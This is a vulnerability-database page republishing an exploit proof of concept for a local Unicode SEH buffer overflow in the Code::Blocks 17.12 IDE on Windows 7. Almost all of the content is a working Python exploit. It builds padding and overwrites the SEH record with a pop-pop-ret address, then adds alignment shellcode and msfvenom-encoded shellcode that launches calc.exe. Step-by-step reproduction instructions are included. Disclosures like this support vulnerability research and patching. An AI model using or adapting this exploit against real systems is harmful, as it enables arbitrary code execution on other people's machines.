Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Code Blocks 17.12 Local Buffer Overflow

🗓️ 18 Jun 2020 00:00:00Reported by Paras BhatiaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 633 Views

Code Blocks 17.12 Local Buffer Overflow exploi

Code
`# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)   
# Vendor Homepage: http://www.codeblocks.org/   
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download  
# Exploit Author: Paras Bhatia  
# Discovery Date: 2020-06-16  
# Vulnerable Software: Code Blocks  
# Version: 17.12  
# Vulnerability Type: Local Buffer Overflow  
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)   
  
#Steps to Produce the Crash:  
  
# 1.- Run python code: codeblocks.py  
# 2.- Copy content to clipboard  
# 3.- Turn off DEP for codeblocks.exe  
# 4.- Open "codeblocks.exe"  
# 5.- Go to "File" > "New" > "Project..."  
# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next"  
# 7.- Paste ClipBoard into the "Filename with fullpath:" .  
# 8.- Click on "Finish".  
# 9.- Calc.exe runs.  
  
  
#################################################################################################################################################  
  
#Python "codeblocks.py" Code:  
  
f= open("codeblocks.txt", "w")  
  
junk1="A" * 2006  
  
  
nseh="\x61\x62" #popad / align  
  
  
#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe  
seh="\xe0\x50"   
  
ven = "\x62" #align  
ven +="\x53" #push ebx  
ven += "\x62" #align  
ven += "\x58" #pop eax  
ven += "\x62" #align  
ven += "\x05\x14\x11" #add eax, 0x11001400  
ven += "\x62" #align  
ven += "\x2d\x13\x11" #sub eax, 0x11001300  
ven += "\x62" #align  
  
ven += "\x50" #push eax  
ven += "\x62" #align  
ven += "\xc3" #ret  
  
junk2="\x41" * 108 #required to make sure shellcode = eax  
  
#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX  
buf = ""  
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"  
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"  
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"  
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"  
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"  
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"  
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"  
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"  
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"  
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"  
buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"  
buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"  
buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"  
buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"  
buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"  
buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"  
buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"  
buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"  
buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"  
buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"  
buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"  
buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"  
buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"  
buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"  
buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"  
buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"  
buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"  
buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"  
buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"  
buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"  
buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"  
buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"  
buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"  
buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"  
buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"  
buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"  
buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"  
buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"  
buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"  
buf += "\x35\x6d\x30\x41\x41"  
  
  
  
  
junk3 = "\x62" * 5000 #padding to crash  
  
  
  
payload = junk1 + nseh + seh + ven + junk2 + buf +junk3  
  
f.write(payload)  
f.close  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jun 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
code blocksbuffer overflowunicodepocwindows 7exploitvulnerabilitysehenglishdepshellcodemsfvenom
633